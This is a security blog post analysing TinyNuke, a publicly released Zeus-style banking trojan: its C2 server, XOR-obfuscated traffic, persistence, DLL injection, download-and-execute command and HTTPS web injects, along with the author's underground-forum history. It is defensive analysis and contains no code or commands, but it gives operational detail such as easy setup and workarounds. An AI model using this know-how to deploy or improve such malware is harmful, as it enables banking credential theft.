TinyNuke May be a Ticking Time Bomb
On March 12th, 2017 a low-profile developer uploaded to Github a mostly functional Botnet code named TinyNuke. The user, Aainz, uses his real name in connection with this code. It’s not unusual for security professionals or hobbyist to release proof of concept code to enable the industry to learn from the latest techniques and test against their own security measures. Aainz’s release looks closer to that of many bad actors before him. The TinyNuke codebase was released as a fully weaponized botnet with built-in features, including HTML code injection, typically used to steal web services credentials. The author himself describes the botnet to be a Zeus-style banking trojan which was first found in the wild in 2007 and became one of the most widely known and used banking trojans to date.
The readme.txt included reads as expected and provides a feature list and installation steps. It is interesting to also see the author spend a portion of his readme separating himself from previous activities of the botnet. He first attacks other researchers for their claims about the functionality of his code and further attempts to separate himself from the underground alias Gosya. Gosya, at the time had been banned from a popular Russian underground forum for aggressively advertising various versions of this Trojan including NukeBot, Micro Banking and the current name TinyNuke.
Many underground forums are a popular place for new actors to learn and eventually teach the tricks-of-the-trade. The primary forum being used is very popular among would-be malware developers. It is not uncommon to see new actors show off their code to share and get feedback using these avenues. Gosya, however, was undercutting the competition with prices ranging from $2500 to $4000 creating a stir with these communities and building a reputation as a potential scammer. Aainz, in an effort to separate himself from both the sale and of the illegal use of his botnet, did two things. First, he released the code publically on Github rebuking claims that he sold the botnet himself, infected users, or is in any way related to Gosya. Second, he took his arguments back to the Russian forums to state his case with at least some success as this account has yet to be banned.
Whether Gosya is Aainz or any of these other accounts are related, the codebase is now publicly available for black hats and white hats to use. To understand how this might impact the security landscape, particularly in the banking industry, we’ve downloaded the source code and tested the setup and functionality of TinyNuke.
TinyNuke has three main components: a command and control server; a Portable Executable (bot) with basic functionality; and a DLL loaded into memory. The server component consists mainly of PHP code which is hosted on an apache webserver and a backend Mysql database. The database stores basic information about the active bots, commands sent, and reporting. The server communicates with the bot via HTTTP traffic over port 80. The port and communication method is not customizable by design. By default, the bot will obfuscate the payload of the communication so the commands and files are not transmitted in clear text. The obfuscation built into the bot is a simple byte XOR using the bot’s id as the key. The server IP or DNS name is configurable in the bot code and stored at compile time which means it cannot be changed dynamically once the executable is created.
The bot itself has three main functions: to install itself on the victim system; communicate with the server; and to inject the DLL provided by the server into memory. During install, the bot copies itself to the user’s Roaming AppData directory using its bot id as its filename and relaunches itself from that location.
On relaunch the bot verifies it has been installed and then starts manipulating the system. It modifies registry entries for IE and Firefox settings to prepare for web injections and makes its first attempt to communicate with the server. The bot will wait until it successfully gets the expected response from the server. Once connected, the bot will make a request for the DLL from the server and inject this DLL into a dllhost.exe process. This DLL holds the main functionality of the bot. TinyNuke was always run with administrative privileges during our analysis. The author assumed the attacker would have already compromised the system and have administrative privileges before running this bot. We found many of the perceivable install and initial run steps would not execute under a lower privileged account.
The bot checks into the server on a user-defined interval once the DLL has been injected into memory. This can be defined on the server’s settings page (shown below). A time period can also be defined for what the server considers a dead or unresponsive bot. The attacker can now issue several commands to the bot from the server’s PHP command interface. These commands will be executed after the next check in. During our research, we tested the download and execute command along with the web injects functionality. The bot also has built in functionality for a socks proxy, VNC connection and ability to update the DLL which was not tested in our environment.
The download and execute command enables the attacker to download any file hosted on a webserver and execute that file. This provides a wide range of possible attack scenarios. The command does not allow for command line parameters to be passed, limiting its functionality. However, executing a batch file or similar technique to provide the attacker whatever parameters required is a simple workaround. As demonstrated in video posted below, a .bat file was used for testing and was executed with ease.
The web inject functionality of the bot allows an attacker to inject code into a webpage the victim has navigated to. The bot pulls the information about the web injects from an attacker-defined file on the webserver. The video posted below demonstrates this feature using an alert message box.
It is also worth noting this feature works with HTTPS sites without invalidating the certificate, allowing an attacker to leverage the trust of a “secure” website to persuade a victim to enter sensitive data into a malicious form. This feature is heavily used to collect credentials on services such as banking web portals.
This release of bot source code does not present any new or unique techniques. It does, however, pull them together in an easy-to-use framework, making these features readily available to attackers who previously may not have been able to utilize them.
Fortunately, a few issues with the TinyNuke codebase prevent it from being functional as-is, at least with our environment. The bugs required to fix the bot deployment were more difficult to troubleshoot than to fix. Implementing the fixes was straightforward, so we expect those bugs to be addressed soon if they have not been already. The bot code also assumes privileged access to the client, which moderately increases the difficulty of using the codebase. Most experienced actors would have their own solutions to resolve this issue, but this may be a hurdle for new actors and may severely limit their choice of potential victims.
Unfortunately, the setup is relatively easy for a moderately tech-savvy actor. Setting up a MySql server and an Apache web server is both free and heavily documented by their respective communities. There are also readily available tools covering most of the installation requirements to setup the botnet infrastructure in less than an hour. The functionality of the panel is barebones, with many features already seen in-the-wild. However, since it enables arbitrary code execution on the victim’s machine, there really isn’t a limit to how the botnet can be used.
We expect other actors to build upon this codebase, improving features and adding new functionality. It’s likely this codebase itself will not become a major botnet, but other actors have a nice framework to start with. In the past, we’ve seen public code become modified to meet the needs of bad actors to great effect. Hidden Tear, an open sourced ransomware released for educational purposes, was taken by malicious actors and modified to fix and improve the released codebase. Today, hundreds of variants exist and more continue to surface every day. It remains to be seen if TinyNuke will see the same success in these circles, but it is certainly possible. For now, the banking industry should be diligent as they are the primary advertised target. Other industries should be cautious as the same features can be used against their business, particularly against their customer base.
Part 1: https://youtu.be/a4K3mQtwfKY
Part 2: https://youtu.be/MbWgDSLqbUQ
This blog was written by Douglas McKee and Charles McFarland